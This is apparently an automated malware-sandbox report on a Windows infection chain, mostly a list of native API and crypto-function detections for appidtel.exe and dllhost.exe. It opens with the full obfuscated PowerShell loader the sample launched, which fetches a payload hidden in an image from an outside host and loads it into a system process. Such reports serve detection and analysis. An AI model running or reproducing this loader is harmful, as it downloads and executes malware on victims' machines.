dmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0042C283 NtClose, 5_2_0042C283
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032835C0 NtCreateMutant,LdrInitializeThunk, 5_2_032835C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282B60 NtClose,LdrInitializeThunk, 5_2_03282B60
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_03282DF0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282C70 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_03282C70
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03284340 NtSetContextThread, 5_2_03284340
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03283010 NtOpenDirectoryObject, 5_2_03283010
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03283090 NtSetValueKey, 5_2_03283090
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03284650 NtSuspendThread, 5_2_03284650
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282BA0 NtEnumerateValueKey, 5_2_03282BA0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282B80 NtQueryInformationFile, 5_2_03282B80
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282BE0 NtQueryValueKey, 5_2_03282BE0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282BF0 NtAllocateVirtualMemory, 5_2_03282BF0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282AB0 NtWaitForSingleObject, 5_2_03282AB0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282AF0 NtWriteFile, 5_2_03282AF0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282AD0 NtReadFile, 5_2_03282AD0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032839B0 NtGetContextThread, 5_2_032839B0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282F30 NtCreateSection, 5_2_03282F30
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282F60 NtCreateProcessEx, 5_2_03282F60
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282FA0 NtQuerySection, 5_2_03282FA0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282FB0 NtResumeThread, 5_2_03282FB0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282F90 NtProtectVirtualMemory, 5_2_03282F90
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282FE0 NtCreateFile, 5_2_03282FE0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282E30 NtWriteVirtualMemory, 5_2_03282E30
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282EA0 NtAdjustPrivilegesToken, 5_2_03282EA0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282E80 NtReadVirtualMemory, 5_2_03282E80
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282EE0 NtQueueApcThread, 5_2_03282EE0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282D30 NtUnmapViewOfSection, 5_2_03282D30
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282D00 NtSetInformationFile, 5_2_03282D00
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03283D10 NtOpenProcessToken, 5_2_03283D10
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282D10 NtMapViewOfSection, 5_2_03282D10
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03283D70 NtOpenThread, 5_2_03283D70
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282DB0 NtEnumerateKey, 5_2_03282DB0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282DD0 NtDelayExecution, 5_2_03282DD0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282C00 NtQueryInformationProcess, 5_2_03282C00
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282C60 NtCreateKey, 5_2_03282C60
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282CA0 NtQueryInformationToken, 5_2_03282CA0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282CF0 NtOpenProcess, 5_2_03282CF0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282CC0 NtQueryVirtualMemory, 5_2_03282CC0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03854340 NtSetContextThread,LdrInitializeThunk, 11_2_03854340
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03854650 NtSuspendThread,LdrInitializeThunk, 11_2_03854650
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038535C0 NtCreateMutant,LdrInitializeThunk, 11_2_038535C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852B60 NtClose,LdrInitializeThunk, 11_2_03852B60
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852AD0 NtReadFile,LdrInitializeThunk, 11_2_03852AD0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852AF0 NtWriteFile,LdrInitializeThunk, 11_2_03852AF0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038539B0 NtGetContextThread,LdrInitializeThunk, 11_2_038539B0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852FB0 NtResumeThread,LdrInitializeThunk, 11_2_03852FB0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852FE0 NtCreateFile,LdrInitializeThunk, 11_2_03852FE0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852F30 NtCreateSection,LdrInitializeThunk, 11_2_03852F30
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852EE0 NtQueueApcThread,LdrInitializeThunk, 11_2_03852EE0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852DD0 NtDelayExecution,LdrInitializeThunk, 11_2_03852DD0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852DF0 NtQuerySystemInformation,LdrInitializeThunk, 11_2_03852DF0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852D10 NtMapViewOfSection,LdrInitializeThunk, 11_2_03852D10
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852D30 NtUnmapViewOfSection,LdrInitializeThunk, 11_2_03852D30
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852CA0 NtQueryInformationToken,LdrInitializeThunk, 11_2_03852CA0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852C60 NtCreateKey,LdrInitializeThunk, 11_2_03852C60
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852C70 NtFreeVirtualMemory,LdrInitializeThunk, 11_2_03852C70
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03853090 NtSetValueKey, 11_2_03853090
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03853010 NtOpenDirectoryObject, 11_2_03853010
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852B80 NtQueryInformationFile, 11_2_03852B80
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852BA0 NtEnumerateValueKey, 11_2_03852BA0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852BE0 NtQueryValueKey, 11_2_03852BE0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852BF0 NtAllocateVirtualMemory, 11_2_03852BF0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852AB0 NtWaitForSingleObject, 11_2_03852AB0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852F90 NtProtectVirtualMemory, 11_2_03852F90
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852FA0 NtQuerySection, 11_2_03852FA0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852F60 NtCreateProcessEx, 11_2_03852F60
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852E80 NtReadVirtualMemory, 11_2_03852E80
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852EA0 NtAdjustPrivilegesToken, 11_2_03852EA0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852E30 NtWriteVirtualMemory, 11_2_03852E30
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852DB0 NtEnumerateKey, 11_2_03852DB0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852D00 NtSetInformationFile, 11_2_03852D00
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03853D10 NtOpenProcessToken, 11_2_03853D10
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03853D70 NtOpenThread, 11_2_03853D70
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852CC0 NtQueryVirtualMemory, 11_2_03852CC0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852CF0 NtOpenProcess, 11_2_03852CF0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852C00 NtQueryInformationProcess, 11_2_03852C00
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030A9190 NtClose, 11_2_030A9190
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030A90F0 NtDeleteFile, 11_2_030A90F0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030A8FF0 NtReadFile, 11_2_030A8FF0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030A8E80 NtCreateFile, 11_2_030A8E80
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD347751FA 4_2_00007FFD347751FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD347729C5 4_2_00007FFD347729C5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD34774311 4_2_00007FFD34774311
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD34772745 4_2_00007FFD34772745
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD34772ED3 4_2_00007FFD34772ED3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD347767F3 4_2_00007FFD347767F3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD34772BFB 4_2_00007FFD34772BFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD347757B2 4_2_00007FFD347757B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD34842FC9 4_2_00007FFD34842FC9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_004182B3 5_2_004182B3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_00413023 5_2_00413023
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0042E8B3 5_2_0042E8B3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_004011C0 5_2_004011C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0040234D 5_2_0040234D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_00402350 5_2_00402350
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0040FB83 5_2_0040FB83
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0041644C 5_2_0041644C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0041648E 5_2_0041648E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_00416493 5_2_00416493
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0040FDA3 5_2_0040FDA3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0040DE19 5_2_0040DE19
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0040DE23 5_2_0040DE23
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_00402E80 5_2_00402E80
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330132D 5_2_0330132D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330A352 5_2_0330A352
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323D34C 5_2_0323D34C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0329739A 5_2_0329739A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325E3F0 5_2_0325E3F0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033103E6 5_2_033103E6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032552A0 5_2_032552A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326B2C0 5_2_0326B2C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D02C0 5_2_032D02C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03240100 5_2_03240100
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032EA118 5_2_032EA118
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0328516C 5_2_0328516C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0331B16B 5_2_0331B16B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D8158 5_2_032D8158
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325B1B0 5_2_0325B1B0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033101AA 5_2_033101AA
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033081CC 5_2_033081CC
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330F0E0 5_2_0330F0E0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033070E9 5_2_033070E9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FF0CC 5_2_032FF0CC
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 5_2_032570C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03250770 5_2_03250770
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03274750 5_2_03274750
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330F7B0 5_2_0330F7B0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324C7C0 5_2_0324C7C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326C6E0 5_2_0326C6E0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033016CC 5_2_033016CC
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03250535 5_2_03250535
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03307571 5_2_03307571
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032ED5B0 5_2_032ED5B0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03310591 5_2_03310591
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330F43F 5_2_0330F43F
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03241460 5_2_03241460
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03302446 5_2_03302446
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FE4F6 5_2_032FE4F6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330FB76 5_2_0330FB76
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330AB40 5_2_0330AB40
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326FB80 5_2_0326FB80
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0328DBF9 5_2_0328DBF9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C5BF0 5_2_032C5BF0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03306BD7 5_2_03306BD7
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C3A6C 5_2_032C3A6C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03307A46 5_2_03307A46
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330FA49 5_2_0330FA49
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032EDAAC 5_2_032EDAAC
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03295AA0 5_2_03295AA0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324EA80 5_2_0324EA80
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FDAC6 5_2_032FDAC6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03266962 5_2_03266962
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03259950 5_2_03259950
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326B950 5_2_0326B950
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032529A0 5_2_032529A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0331A9A6 5_2_0331A9A6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032BD800 5_2_032BD800
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03252840 5_2_03252840
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325A840 5_2_0325A840
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032368B8 5_2_032368B8
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032538E0 5_2_032538E0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0327E8F0 5_2_0327E8F0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03292F28 5_2_03292F28
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03270F30 5_2_03270F30
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330FF09 5_2_0330FF09
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C4F40 5_2_032C4F40
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330FFB1 5_2_0330FFB1
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032CEFA0 5_2_032CEFA0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03251F92 5_2_03251F92
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325CFE0 5_2_0325CFE0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03242FC8 5_2_03242FC8
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03213FD2 5_2_03213FD2
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03213FD5 5_2_03213FD5
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330EE26 5_2_0330EE26
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03250E59 5_2_03250E59
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03259EB0 5_2_03259EB0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330CE93 5_2_0330CE93
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03262E90 5_2_03262E90
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330EEDB 5_2_0330EEDB
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325AD00 5_2_0325AD00
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03307D73 5_2_03307D73
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03253D40 5_2_03253D40
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03301D5A 5_2_03301D5A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03268DBF 5_2_03268DBF
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324ADE0 5_2_0324ADE0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326FDC0 5_2_0326FDC0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032C9C32 5_2_032C9C32
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03250C00 5_2_03250C00
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0CB5 5_2_032F0CB5
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330FCF2 5_2_0330FCF2
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03240CF2 5_2_03240CF2
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 10_2_0304C31E 10_2_0304C31E
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 10_2_03052BE7 10_2_03052BE7
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 10_2_0306B04E 10_2_0306B04E
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 10_2_0304C53E 10_2_0304C53E
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 10_2_0304A5B4 10_2_0304A5B4
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 10_2_0304A5BE 10_2_0304A5BE
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 10_2_03052C2E 10_2_03052C2E
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Code function: 10_2_03052C29 10_2_03052C29
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0386739A 11_2_0386739A
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038E03E6 11_2_038E03E6
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382E3F0 11_2_0382E3F0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D132D 11_2_038D132D
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380D34C 11_2_0380D34C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038DA352 11_2_038DA352
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038252A0 11_2_038252A0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0383B2C0 11_2_0383B2C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C12ED 11_2_038C12ED
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038C0274 11_2_038C0274
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038E01AA 11_2_038E01AA
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0382B1B0 11_2_0382B1B0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D81CC 11_2_038D81CC
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03810100 11_2_03810100
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038BA118 11_2_038BA118
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038EB16B 11_2_038EB16B
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0385516C 11_2_0385516C
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_0380F172 11_2_0380F172
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038CF0CC 11_2_038CF0CC
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038270C0 11_2_038270C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038D70E9 11_2_038D70E9
